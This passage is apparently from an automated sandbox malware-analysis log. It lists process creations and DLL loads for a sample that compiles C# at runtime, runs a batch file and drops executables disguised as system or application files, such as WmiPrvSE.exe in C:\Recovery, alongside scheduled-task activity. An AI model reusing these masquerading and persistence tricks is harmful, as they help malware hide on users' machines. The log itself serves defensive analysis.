                              Source: unknownProcess created: C:\Users\user\Desktop\r6cRyCpdfS.exe "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FF9.tmp" "c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: wldp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: profapi.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: wldp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: profapi.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ktmw32.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: dnsapi.dll
